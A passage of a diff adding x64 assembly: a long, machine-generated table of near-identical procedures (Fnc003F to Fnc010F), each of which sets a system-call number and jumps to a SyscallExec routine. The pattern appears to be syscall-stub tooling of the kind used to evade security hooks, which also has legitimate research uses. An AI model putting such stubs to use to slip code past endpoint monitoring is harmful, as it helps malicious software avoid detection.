+ ret
+ nop
+ Fnc003E ENDP
+
+ Fnc003F PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 003fh
+ ret
+ nop
+ Fnc003F ENDP
+
+ Fnc0040 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0040h
+ ret
+ nop
+ Fnc0040 ENDP
+
+ Fnc0041 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0041h
+ ret
+ nop
+ Fnc0041 ENDP
+
+ Fnc0042 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0042h
+ ret
+ nop
+ Fnc0042 ENDP
+
+ Fnc0043 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0043h
+ ret
+ nop
+ Fnc0043 ENDP
+
+ Fnc0044 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0044h
+ ret
+ nop
+ Fnc0044 ENDP
+
+ Fnc0045 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0045h
+ ret
+ nop
+ Fnc0045 ENDP
+
+ Fnc0046 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0046h
+ ret
+ nop
+ Fnc0046 ENDP
+
+ Fnc0047 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0047h
+ ret
+ nop
+ Fnc0047 ENDP
+
+ Fnc0048 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0048h
+ ret
+ nop
+ Fnc0048 ENDP
+
+ Fnc0049 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0049h
+ ret
+ nop
+ Fnc0049 ENDP
+
+ Fnc004A PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 004ah
+ ret
+ nop
+ Fnc004A ENDP
+
+ Fnc004B PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 004bh
+ ret
+ nop
+ Fnc004B ENDP
+
+ Fnc004C PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 004ch
+ ret
+ nop
+ Fnc004C ENDP
+
+ Fnc004D PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 004dh
+ ret
+ nop
+ Fnc004D ENDP
+
+ Fnc004E PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 004eh
+ ret
+ nop
+ Fnc004E ENDP
+
+ Fnc004F PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 004fh
+ ret
+ nop
+ Fnc004F ENDP
+
+ Fnc0050 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0050h
+ ret
+ nop
+ Fnc0050 ENDP
+
+ Fnc0051 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0051h
+ ret
+ nop
+ Fnc0051 ENDP
+
+ Fnc0052 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0052h
+ ret
+ nop
+ Fnc0052 ENDP
+
+ Fnc0053 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0053h
+ ret
+ nop
+ Fnc0053 ENDP
+
+ Fnc0054 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0054h
+ ret
+ nop
+ Fnc0054 ENDP
+
+ Fnc0055 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0055h
+ ret
+ nop
+ Fnc0055 ENDP
+
+ Fnc0056 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0056h
+ ret
+ nop
+ Fnc0056 ENDP
+
+ Fnc0057 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0057h
+ ret
+ nop
+ Fnc0057 ENDP
+
+ Fnc0058 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0058h
+ ret
+ nop
+ Fnc0058 ENDP
+
+ Fnc0059 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0059h
+ ret
+ nop
+ Fnc0059 ENDP
+
+ Fnc005A PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 005ah
+ ret
+ nop
+ Fnc005A ENDP
+
+ Fnc005B PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 005bh
+ ret
+ nop
+ Fnc005B ENDP
+
+ Fnc005C PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 005ch
+ ret
+ nop
+ Fnc005C ENDP
+
+ Fnc005D PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 005dh
+ ret
+ nop
+ Fnc005D ENDP
+
+ Fnc005E PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 005eh
+ ret
+ nop
+ Fnc005E ENDP
+
+ Fnc005F PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 005fh
+ ret
+ nop
+ Fnc005F ENDP
+
+ Fnc0060 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0060h
+ ret
+ nop
+ Fnc0060 ENDP
+
+ Fnc0061 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0061h
+ ret
+ nop
+ Fnc0061 ENDP
+
+ Fnc0062 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0062h
+ ret
+ nop
+ Fnc0062 ENDP
+
+ Fnc0063 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0063h
+ ret
+ nop
+ Fnc0063 ENDP
+
+ Fnc0064 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0064h
+ ret
+ nop
+ Fnc0064 ENDP
+
+ Fnc0065 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0065h
+ ret
+ nop
+ Fnc0065 ENDP
+
+ Fnc0066 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0066h
+ ret
+ nop
+ Fnc0066 ENDP
+
+ Fnc0067 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0067h
+ ret
+ nop
+ Fnc0067 ENDP
+
+ Fnc0068 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0068h
+ ret
+ nop
+ Fnc0068 ENDP
+
+ Fnc0069 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0069h
+ ret
+ nop
+ Fnc0069 ENDP
+
+ Fnc006A PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 006ah
+ ret
+ nop
+ Fnc006A ENDP
+
+ Fnc006B PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 006bh
+ ret
+ nop
+ Fnc006B ENDP
+
+ Fnc006C PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 006ch
+ ret
+ nop
+ Fnc006C ENDP
+
+ Fnc006D PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 006dh
+ ret
+ nop
+ Fnc006D ENDP
+
+ Fnc006E PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 006eh
+ ret
+ nop
+ Fnc006E ENDP
+
+ Fnc006F PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 006fh
+ ret
+ nop
+ Fnc006F ENDP
+
+ Fnc0070 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0070h
+ ret
+ nop
+ Fnc0070 ENDP
+
+ Fnc0071 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0071h
+ ret
+ nop
+ Fnc0071 ENDP
+
+ Fnc0072 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0072h
+ ret
+ nop
+ Fnc0072 ENDP
+
+ Fnc0073 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0073h
+ ret
+ nop
+ Fnc0073 ENDP
+
+ Fnc0074 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0074h
+ ret
+ nop
+ Fnc0074 ENDP
+
+ Fnc0075 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0075h
+ ret
+ nop
+ Fnc0075 ENDP
+
+ Fnc0076 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0076h
+ ret
+ nop
+ Fnc0076 ENDP
+
+ Fnc0077 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0077h
+ ret
+ nop
+ Fnc0077 ENDP
+
+ Fnc0078 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0078h
+ ret
+ nop
+ Fnc0078 ENDP
+
+ Fnc0079 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0079h
+ ret
+ nop
+ Fnc0079 ENDP
+
+ Fnc007A PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 007ah
+ ret
+ nop
+ Fnc007A ENDP
+
+ Fnc007B PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 007bh
+ ret
+ nop
+ Fnc007B ENDP
+
+ Fnc007C PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 007ch
+ ret
+ nop
+ Fnc007C ENDP
+
+ Fnc007D PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 007dh
+ ret
+ nop
+ Fnc007D ENDP
+
+ Fnc007E PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 007eh
+ ret
+ nop
+ Fnc007E ENDP
+
+ Fnc007F PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 007fh
+ ret
+ nop
+ Fnc007F ENDP
+
+ Fnc0080 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0080h
+ ret
+ nop
+ Fnc0080 ENDP
+
+ Fnc0081 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0081h
+ ret
+ nop
+ Fnc0081 ENDP
+
+ Fnc0082 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0082h
+ ret
+ nop
+ Fnc0082 ENDP
+
+ Fnc0083 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0083h
+ ret
+ nop
+ Fnc0083 ENDP
+
+ Fnc0084 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0084h
+ ret
+ nop
+ Fnc0084 ENDP
+
+ Fnc0085 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0085h
+ ret
+ nop
+ Fnc0085 ENDP
+
+ Fnc0086 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0086h
+ ret
+ nop
+ Fnc0086 ENDP
+
+ Fnc0087 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0087h
+ ret
+ nop
+ Fnc0087 ENDP
+
+ Fnc0088 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0088h
+ ret
+ nop
+ Fnc0088 ENDP
+
+ Fnc0089 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0089h
+ ret
+ nop
+ Fnc0089 ENDP
+
+ Fnc008A PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 008ah
+ ret
+ nop
+ Fnc008A ENDP
+
+ Fnc008B PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 008bh
+ ret
+ nop
+ Fnc008B ENDP
+
+ Fnc008C PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 008ch
+ ret
+ nop
+ Fnc008C ENDP
+
+ Fnc008D PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 008dh
+ ret
+ nop
+ Fnc008D ENDP
+
+ Fnc008E PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 008eh
+ ret
+ nop
+ Fnc008E ENDP
+
+ Fnc008F PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 008fh
+ ret
+ nop
+ Fnc008F ENDP
+
+ Fnc0090 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0090h
+ ret
+ nop
+ Fnc0090 ENDP
+
+ Fnc0091 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0091h
+ ret
+ nop
+ Fnc0091 ENDP
+
+ Fnc0092 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0092h
+ ret
+ nop
+ Fnc0092 ENDP
+
+ Fnc0093 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0093h
+ ret
+ nop
+ Fnc0093 ENDP
+
+ Fnc0094 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0094h
+ ret
+ nop
+ Fnc0094 ENDP
+
+ Fnc0095 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0095h
+ ret
+ nop
+ Fnc0095 ENDP
+
+ Fnc0096 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0096h
+ ret
+ nop
+ Fnc0096 ENDP
+
+ Fnc0097 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0097h
+ ret
+ nop
+ Fnc0097 ENDP
+
+ Fnc0098 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0098h
+ ret
+ nop
+ Fnc0098 ENDP
+
+ Fnc0099 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0099h
+ ret
+ nop
+ Fnc0099 ENDP
+
+ Fnc009A PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 009ah
+ ret
+ nop
+ Fnc009A ENDP
+
+ Fnc009B PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 009bh
+ ret
+ nop
+ Fnc009B ENDP
+
+ Fnc009C PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 009ch
+ ret
+ nop
+ Fnc009C ENDP
+
+ Fnc009D PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 009dh
+ ret
+ nop
+ Fnc009D ENDP
+
+ Fnc009E PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 009eh
+ ret
+ nop
+ Fnc009E ENDP
+
+ Fnc009F PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 009fh
+ ret
+ nop
+ Fnc009F ENDP
+
+ Fnc00A0 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00a0h
+ ret
+ nop
+ Fnc00A0 ENDP
+
+ Fnc00A1 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00a1h
+ ret
+ nop
+ Fnc00A1 ENDP
+
+ Fnc00A2 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00a2h
+ ret
+ nop
+ Fnc00A2 ENDP
+
+ Fnc00A3 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00a3h
+ ret
+ nop
+ Fnc00A3 ENDP
+
+ Fnc00A4 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00a4h
+ ret
+ nop
+ Fnc00A4 ENDP
+
+ Fnc00A5 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00a5h
+ ret
+ nop
+ Fnc00A5 ENDP
+
+ Fnc00A6 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00a6h
+ ret
+ nop
+ Fnc00A6 ENDP
+
+ Fnc00A7 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00a7h
+ ret
+ nop
+ Fnc00A7 ENDP
+
+ Fnc00A8 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00a8h
+ ret
+ nop
+ Fnc00A8 ENDP
+
+ Fnc00A9 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00a9h
+ ret
+ nop
+ Fnc00A9 ENDP
+
+ Fnc00AA PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00aah
+ ret
+ nop
+ Fnc00AA ENDP
+
+ Fnc00AB PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00abh
+ ret
+ nop
+ Fnc00AB ENDP
+
+ Fnc00AC PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00ach
+ ret
+ nop
+ Fnc00AC ENDP
+
+ Fnc00AD PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00adh
+ ret
+ nop
+ Fnc00AD ENDP
+
+ Fnc00AE PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00aeh
+ ret
+ nop
+ Fnc00AE ENDP
+
+ Fnc00AF PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00afh
+ ret
+ nop
+ Fnc00AF ENDP
+
+ Fnc00B0 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00b0h
+ ret
+ nop
+ Fnc00B0 ENDP
+
+ Fnc00B1 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00b1h
+ ret
+ nop
+ Fnc00B1 ENDP
+
+ Fnc00B2 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00b2h
+ ret
+ nop
+ Fnc00B2 ENDP
+
+ Fnc00B3 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00b3h
+ ret
+ nop
+ Fnc00B3 ENDP
+
+ Fnc00B4 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00b4h
+ ret
+ nop
+ Fnc00B4 ENDP
+
+ Fnc00B5 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00b5h
+ ret
+ nop
+ Fnc00B5 ENDP
+
+ Fnc00B6 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00b6h
+ ret
+ nop
+ Fnc00B6 ENDP
+
+ Fnc00B7 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00b7h
+ ret
+ nop
+ Fnc00B7 ENDP
+
+ Fnc00B8 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00b8h
+ ret
+ nop
+ Fnc00B8 ENDP
+
+ Fnc00B9 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00b9h
+ ret
+ nop
+ Fnc00B9 ENDP
+
+ Fnc00BA PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00bah
+ ret
+ nop
+ Fnc00BA ENDP
+
+ Fnc00BB PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00bbh
+ ret
+ nop
+ Fnc00BB ENDP
+
+ Fnc00BC PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00bch
+ ret
+ nop
+ Fnc00BC ENDP
+
+ Fnc00BD PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00bdh
+ ret
+ nop
+ Fnc00BD ENDP
+
+ Fnc00BE PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00beh
+ ret
+ nop
+ Fnc00BE ENDP
+
+ Fnc00BF PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00bfh
+ ret
+ nop
+ Fnc00BF ENDP
+
+ Fnc00C0 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00c0h
+ ret
+ nop
+ Fnc00C0 ENDP
+
+ Fnc00C1 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00c1h
+ ret
+ nop
+ Fnc00C1 ENDP
+
+ Fnc00C2 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00c2h
+ ret
+ nop
+ Fnc00C2 ENDP
+
+ Fnc00C3 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00c3h
+ ret
+ nop
+ Fnc00C3 ENDP
+
+ Fnc00C4 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00c4h
+ ret
+ nop
+ Fnc00C4 ENDP
+
+ Fnc00C5 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00c5h
+ ret
+ nop
+ Fnc00C5 ENDP
+
+ Fnc00C6 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00c6h
+ ret
+ nop
+ Fnc00C6 ENDP
+
+ Fnc00C7 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00c7h
+ ret
+ nop
+ Fnc00C7 ENDP
+
+ Fnc00C8 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00c8h
+ ret
+ nop
+ Fnc00C8 ENDP
+
+ Fnc00C9 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00c9h
+ ret
+ nop
+ Fnc00C9 ENDP
+
+ Fnc00CA PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00cah
+ ret
+ nop
+ Fnc00CA ENDP
+
+ Fnc00CB PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00cbh
+ ret
+ nop
+ Fnc00CB ENDP
+
+ Fnc00CC PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00cch
+ ret
+ nop
+ Fnc00CC ENDP
+
+ Fnc00CD PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00cdh
+ ret
+ nop
+ Fnc00CD ENDP
+
+ Fnc00CE PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00ceh
+ ret
+ nop
+ Fnc00CE ENDP
+
+ Fnc00CF PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00cfh
+ ret
+ nop
+ Fnc00CF ENDP
+
+ Fnc00D0 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00d0h
+ ret
+ nop
+ Fnc00D0 ENDP
+
+ Fnc00D1 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00d1h
+ ret
+ nop
+ Fnc00D1 ENDP
+
+ Fnc00D2 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00d2h
+ ret
+ nop
+ Fnc00D2 ENDP
+
+ Fnc00D3 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00d3h
+ ret
+ nop
+ Fnc00D3 ENDP
+
+ Fnc00D4 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00d4h
+ ret
+ nop
+ Fnc00D4 ENDP
+
+ Fnc00D5 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00d5h
+ ret
+ nop
+ Fnc00D5 ENDP
+
+ Fnc00D6 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00d6h
+ ret
+ nop
+ Fnc00D6 ENDP
+
+ Fnc00D7 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00d7h
+ ret
+ nop
+ Fnc00D7 ENDP
+
+ Fnc00D8 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00d8h
+ ret
+ nop
+ Fnc00D8 ENDP
+
+ Fnc00D9 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00d9h
+ ret
+ nop
+ Fnc00D9 ENDP
+
+ Fnc00DA PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00dah
+ ret
+ nop
+ Fnc00DA ENDP
+
+ Fnc00DB PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00dbh
+ ret
+ nop
+ Fnc00DB ENDP
+
+ Fnc00DC PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00dch
+ ret
+ nop
+ Fnc00DC ENDP
+
+ Fnc00DD PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00ddh
+ ret
+ nop
+ Fnc00DD ENDP
+
+ Fnc00DE PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00deh
+ ret
+ nop
+ Fnc00DE ENDP
+
+ Fnc00DF PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00dfh
+ ret
+ nop
+ Fnc00DF ENDP
+
+ Fnc00E0 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00e0h
+ ret
+ nop
+ Fnc00E0 ENDP
+
+ Fnc00E1 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00e1h
+ ret
+ nop
+ Fnc00E1 ENDP
+
+ Fnc00E2 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00e2h
+ ret
+ nop
+ Fnc00E2 ENDP
+
+ Fnc00E3 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00e3h
+ ret
+ nop
+ Fnc00E3 ENDP
+
+ Fnc00E4 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00e4h
+ ret
+ nop
+ Fnc00E4 ENDP
+
+ Fnc00E5 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00e5h
+ ret
+ nop
+ Fnc00E5 ENDP
+
+ Fnc00E6 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00e6h
+ ret
+ nop
+ Fnc00E6 ENDP
+
+ Fnc00E7 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00e7h
+ ret
+ nop
+ Fnc00E7 ENDP
+
+ Fnc00E8 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00e8h
+ ret
+ nop
+ Fnc00E8 ENDP
+
+ Fnc00E9 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00e9h
+ ret
+ nop
+ Fnc00E9 ENDP
+
+ Fnc00EA PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00eah
+ ret
+ nop
+ Fnc00EA ENDP
+
+ Fnc00EB PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00ebh
+ ret
+ nop
+ Fnc00EB ENDP
+
+ Fnc00EC PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00ech
+ ret
+ nop
+ Fnc00EC ENDP
+
+ Fnc00ED PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00edh
+ ret
+ nop
+ Fnc00ED ENDP
+
+ Fnc00EE PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00eeh
+ ret
+ nop
+ Fnc00EE ENDP
+
+ Fnc00EF PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00efh
+ ret
+ nop
+ Fnc00EF ENDP
+
+ Fnc00F0 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00f0h
+ ret
+ nop
+ Fnc00F0 ENDP
+
+ Fnc00F1 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00f1h
+ ret
+ nop
+ Fnc00F1 ENDP
+
+ Fnc00F2 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00f2h
+ ret
+ nop
+ Fnc00F2 ENDP
+
+ Fnc00F3 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00f3h
+ ret
+ nop
+ Fnc00F3 ENDP
+
+ Fnc00F4 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00f4h
+ ret
+ nop
+ Fnc00F4 ENDP
+
+ Fnc00F5 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00f5h
+ ret
+ nop
+ Fnc00F5 ENDP
+
+ Fnc00F6 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00f6h
+ ret
+ nop
+ Fnc00F6 ENDP
+
+ Fnc00F7 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00f7h
+ ret
+ nop
+ Fnc00F7 ENDP
+
+ Fnc00F8 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00f8h
+ ret
+ nop
+ Fnc00F8 ENDP
+
+ Fnc00F9 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00f9h
+ ret
+ nop
+ Fnc00F9 ENDP
+
+ Fnc00FA PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00fah
+ ret
+ nop
+ Fnc00FA ENDP
+
+ Fnc00FB PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00fbh
+ ret
+ nop
+ Fnc00FB ENDP
+
+ Fnc00FC PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00fch
+ ret
+ nop
+ Fnc00FC ENDP
+
+ Fnc00FD PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00fdh
+ ret
+ nop
+ Fnc00FD ENDP
+
+ Fnc00FE PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00feh
+ ret
+ nop
+ Fnc00FE ENDP
+
+ Fnc00FF PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00ffh
+ ret
+ nop
+ Fnc00FF ENDP
+
+ Fnc0100 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0100h
+ ret
+ nop
+ Fnc0100 ENDP
+
+ Fnc0101 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0101h
+ ret
+ nop
+ Fnc0101 ENDP
+
+ Fnc0102 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0102h
+ ret
+ nop
+ Fnc0102 ENDP
+
+ Fnc0103 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0103h
+ ret
+ nop
+ Fnc0103 ENDP
+
+ Fnc0104 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0104h
+ ret
+ nop
+ Fnc0104 ENDP
+
+ Fnc0105 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0105h
+ ret
+ nop
+ Fnc0105 ENDP
+
+ Fnc0106 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0106h
+ ret
+ nop
+ Fnc0106 ENDP
+
+ Fnc0107 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0107h
+ ret
+ nop
+ Fnc0107 ENDP
+
+ Fnc0108 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0108h
+ ret
+ nop
+ Fnc0108 ENDP
+
+ Fnc0109 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0109h
+ ret
+ nop
+ Fnc0109 ENDP
+
+ Fnc010A PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 010ah
+ ret
+ nop
+ Fnc010A ENDP
+
+ Fnc010B PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 010bh
+ ret
+ nop
+ Fnc010B ENDP
+
+ Fnc010C PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 010ch
+ ret
+ nop
+ Fnc010C ENDP
+
+ Fnc010D PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 010dh
+ ret
+ nop
+ Fnc010D ENDP
+
+ Fnc010E PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 010eh
+ ret
+ nop
+ Fnc010E ENDP
+
+ Fnc010F PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 010fh
+ ret
+ nop
+ Fnc010F ENDP
+
+ Fnc0110 PROC
